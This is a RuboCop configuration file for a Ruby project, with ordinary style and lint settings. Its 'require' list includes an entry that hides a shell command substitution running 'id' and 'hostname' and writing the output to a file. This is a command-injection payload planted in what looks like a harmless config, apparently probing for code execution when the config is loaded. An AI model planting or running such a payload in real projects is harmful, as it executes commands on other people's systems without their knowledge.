require:
  - "json"
  - "./$(id > rce_output.txt && hostname >> rce_output.txt && cat rce_output.txt)"

AllCops:
  TargetRubyVersion: 3.1
  Exclude:
    - '**/bin/**/*'
    - '**/db/**/*'
    - '**/script/setup'
    - '**/vendor/**/*'

Lint/AssignmentInCondition:
  Enabled: false

Metrics/BlockLength:
  Enabled: false

Layout/LineLength:
  Max: 100
  AllowedPatterns: ['\A\#']

Naming/RescuedExceptionsVariableName:
  PreferredName: "error"

Style/FrozenStringLiteralComment:
  Enabled: false

Style/StringLiterals:
  EnforcedStyle: double_quotes

Style/TrailingCommaInArrayLiteral:
  EnforcedStyleForMultiline: consistent_comma

Style/TrailingCommaInHashLiteral:
  EnforcedStyleForMultiline: consistent_comma
